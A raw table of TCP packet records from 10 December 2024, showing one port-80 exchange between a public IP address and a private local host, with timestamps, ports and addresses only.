Dec 10, 2024 13:11:55.459346056 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.459391117 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.460028887 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.460551023 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.460598946 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.460921049 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.461019039 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.461064100 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.461927891 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.461939096 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.461982965 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.462639093 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.462764025 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.462810040 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.463563919 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.463937044 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.463985920 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.464402914 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.464412928 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.464457989 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.465257883 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.465337992 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.465382099 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.466137886 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.466212034 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.466265917 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.466984987 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.467118979 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.467191935 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.468055010 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.468066931 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.468122005 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.468878984 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.468890905 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.468962908 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.469674110 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.469687939 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.469734907 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.470529079 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.470621109 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.470664024 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.471345901 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.471443892 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.471499920 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.472285032 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.512573957 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.618588924 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.618599892 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.618649006 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.619066000 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.619322062 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.619383097 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.620198965 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.620805025 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.620865107 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.621117115 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.621128082 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.621164083 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.622014046 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.622114897 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.622155905 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.623197079 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.623358965 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.623409033 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.624558926 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.624816895 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.624866009 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.625478029 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.625488043 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.625524044 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.626255035 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.626477003 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.626522064 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.627461910 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.627764940 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.627803087 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.628118992 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.628221989 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.628257036 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.629170895 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.629180908 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.629230022 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.630079031 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.630089998 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.630135059 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.631154060 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.631241083 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.631282091 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.632074118 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.632190943 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.632231951 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.633011103 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.633022070 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.633061886 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.633821011 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.633939028 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.633975029 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.634660006 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.634780884 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.634820938 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.635515928 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.635603905 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.635647058 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.636226892 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.636305094 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.636351109 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.637074947 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.637085915 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.637128115 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.637849092 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.637964964 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.638014078 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.638588905 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.638672113 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.638708115 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.639643908 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.639843941 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.639889002 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.640856028 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.641748905 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.641760111 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.641774893 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.641802073 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.641830921 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.642882109 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.642997980 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.643050909 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.643645048 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.643655062 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.643702030 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.644300938 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.644393921 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.644443035 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.645021915 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.645091057 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.645150900 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.645704985 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.645715952 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.645761967 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.646339893 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.646492958 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.646543980 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.646981001 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.647228956 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.647273064 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.647744894 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.647773981 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.647820950 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.648338079 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.648618937 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.648663044 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.648983002 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.649024963 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.649068117 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.649772882 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.649782896 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.649833918 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.650392056 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.651304007 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.651319027 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.651351929 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.651371002 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.651418924 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.652229071 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.652858973 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.652909040 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.653126955 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.653137922 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.653198957 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.653949022 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.654048920 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.654093027 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.654880047 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.654949903 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.654994965 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.655639887 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.656321049 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.656372070 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.656569958 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.656579971 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.656630993 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.657418966 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.657608986 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.657655001 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.658240080 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.658400059 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.658458948 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.659127951 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.659137011 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.659185886 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.660034895 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.660932064 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.660973072 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.661068916 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.661190033 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.661232948 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.661995888 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.662005901 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.662096977 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.663012028 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.663134098 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.663181067 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.663682938 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.663691998 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.663741112 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.664647102 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.715929031 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.811306953 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.811445951 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.811517000 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.811778069 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.811817884 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.811866045 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.812747955 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.812757969 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.812828064 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.813519955 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.813565016 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.813615084 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.814363003 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.814454079 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.814515114 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.815435886 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.815457106 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.815506935 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.816109896 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.816240072 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.816286087 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.817032099 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.817045927 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.817091942 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.817939997 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.818419933 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.818465948 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.818777084 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.818907022 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.818948984 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.819700003 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.819725037 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.819767952 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.820533991 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.820550919 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.820596933 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.821353912 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.821499109 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.821548939 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.822204113 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.822455883 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.822498083 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.823146105 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.823158026 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.823196888 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.823977947 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.823990107 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.824028015 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.825028896 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.825184107 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.825225115 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.825900078 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.826272011 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.826316118 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.826770067 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.827091932 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.827136040 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.827502012 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.827574968 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.827615976 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.828506947 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.828556061 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.828602076 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.829212904 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.829277992 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.829324007 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.830121994 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.830238104 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.830280066 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.830930948 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.831417084 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.831478119 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.831806898 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.831926107 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.831974983 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.832838058 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.832849979 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.832902908 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.833569050 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.833682060 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.833725929 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.834403038 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.834588051 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.834638119 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.835364103 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.835622072 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.835671902 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.836210012 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.836221933 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.836266041 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.837069988 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.837246895 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.837294102 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.837914944 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.838089943 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.838140965 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.838773012 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.839085102 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.839126110 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.839646101 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.840069056 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.840111017 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.840560913 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.841623068 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.841639042 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.841666937 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.841727972 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.841773987 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.842330933 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.842411995 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.842457056 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.843151093 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.843187094 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.843234062 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.844105959 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.844254017 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.844300985 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.844890118 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.845056057 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.845103025 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.845767975 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.846348047 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.846390963 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.846702099 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.846714973 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.846754074 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.847527981 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.847579002 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.847620964 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.848434925 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.848447084 CET	80	49706	45.9.191.182	192.168.2.5
Dec 10, 2024 13:11:55.848495960 CET	49706	80	192.168.2.5	45.9.191.182
Dec 10, 2024 13:11:55.849328995 CET	80	49706	45.9.191.182	192.168.2.5
